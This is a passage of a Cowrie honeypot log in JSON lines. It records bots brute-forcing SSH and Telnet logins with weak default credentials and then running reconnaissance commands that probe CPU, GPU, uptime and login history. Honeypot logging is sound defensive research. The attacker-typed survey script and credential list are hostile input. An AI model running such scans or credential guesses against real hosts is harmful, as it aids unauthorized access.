com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:46.898514Z","src_ip":"212.227.125.160","session":"94cd91631b0c"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:47.325506Z","src_ip":"212.227.125.160","session":"94cd91631b0c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:48.404390Z","src_ip":"212.227.125.160","session":"94cd91631b0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37190,"dst_ip":"1.2.3.4","dst_port":22,"session":"59626c5a319b","protocol":"ssh","message":"New connection: 212.227.125.160:37190 (1.2.3.4:22) [session: 59626c5a319b]","sensor":"my-vps","timestamp":"2025-08-26T11:59:52.192019Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38219,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd494f3c7f96","protocol":"telnet","message":"New connection: 212.227.235.229:38219 (1.2.3.4:23) [session: dd494f3c7f96]","sensor":"my-vps","timestamp":"2025-08-26T11:59:52.495569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:52.498310Z","src_ip":"212.227.125.160","session":"59626c5a319b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:52.966362Z","src_ip":"212.227.125.160","session":"59626c5a319b"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:53.573806Z","src_ip":"212.227.125.160","session":"59626c5a319b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:54.625385Z","src_ip":"212.227.125.160","session":"59626c5a319b"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33456,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b6e4a20d722","protocol":"ssh","message":"New connection: 83.168.105.65:33456 (1.2.3.4:22) [session: 1b6e4a20d722]","sensor":"my-vps","timestamp":"2025-08-26T11:59:54.845265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:54.846226Z","src_ip":"83.168.105.65","session":"1b6e4a20d722"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:54.881749Z","src_ip":"83.168.105.65","session":"1b6e4a20d722"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:59:54.990886Z","src_ip":"83.168.105.65","session":"1b6e4a20d722"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:59:55.139008Z","src_ip":"83.168.105.65","session":"1b6e4a20d722"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:59:55.139808Z","src_ip":"83.168.105.65","session":"1b6e4a20d722"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:55.177197Z","src_ip":"83.168.105.65","session":"1b6e4a20d722"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:55.178456Z","src_ip":"83.168.105.65","session":"1b6e4a20d722"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38046,"dst_ip":"1.2.3.4","dst_port":22,"session":"e099b44915a1","protocol":"ssh","message":"New connection: 196.251.86.249:38046 (1.2.3.4:22) [session: e099b44915a1]","sensor":"my-vps","timestamp":"2025-08-26T11:59:57.237569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:57.776743Z","src_ip":"196.251.86.249","session":"e099b44915a1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:59:57.800902Z","src_ip":"196.251.86.249","session":"e099b44915a1"}
{"eventid":"cowrie.login.failed","username":"git","password":"pass1234","message":"login attempt [git/pass1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:59.726834Z","src_ip":"196.251.86.249","session":"e099b44915a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37962,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc592182643f","protocol":"ssh","message":"New connection: 212.227.125.160:37962 (1.2.3.4:22) [session: cc592182643f]","sensor":"my-vps","timestamp":"2025-08-26T11:59:59.775689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:59.803047Z","src_ip":"212.227.125.160","session":"cc592182643f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:59.843188Z","src_ip":"212.227.125.160","session":"cc592182643f"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:00:00.347334Z","src_ip":"212.227.125.160","session":"cc592182643f"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:01.111809Z","src_ip":"196.251.86.249","session":"e099b44915a1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:01.533546Z","src_ip":"212.227.125.160","session":"cc592182643f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46946,"dst_ip":"1.2.3.4","dst_port":22,"session":"05bce8e390f4","protocol":"ssh","message":"New connection: 212.227.235.229:46946 (1.2.3.4:22) [session: 05bce8e390f4]","sensor":"my-vps","timestamp":"2025-08-26T12:00:03.509987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:03.871198Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:00:03.871997Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:00:05.576769Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38734,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9d0d2ec73ad","protocol":"ssh","message":"New connection: 212.227.125.160:38734 (1.2.3.4:22) [session: d9d0d2ec73ad]","sensor":"my-vps","timestamp":"2025-08-26T12:00:05.623310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:05.643512Z","src_ip":"212.227.125.160","session":"d9d0d2ec73ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:00:05.709467Z","src_ip":"212.227.125.160","session":"d9d0d2ec73ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:00:06.360117Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.360819Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.361360Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.362335Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.363525Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.364343Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.365136Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.366102Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.366586Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.367199Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.367816Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.368547Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.368955Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.652415Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.653677Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.655077Z","src_ip":"212.227.235.229","session":"05bce8e390f4"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-26T12:00:06.867799Z","src_ip":"212.227.125.160","session":"d9d0d2ec73ad"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:00:08.226909Z","src_ip":"212.227.125.160","session":"d9d0d2ec73ad"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41134,"dst_ip":"1.2.3.4","dst_port":22,"session":"e001f191a858","protocol":"ssh","message":"New connection: 83.168.105.65:41134 (1.2.3.4:22) [session: e001f191a858]","sensor":"my-vps","timestamp":"2025-08-26T12:00:10.090930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:00:10.092005Z","src_ip":"83.168.105.65","session":"e001f191a858"}
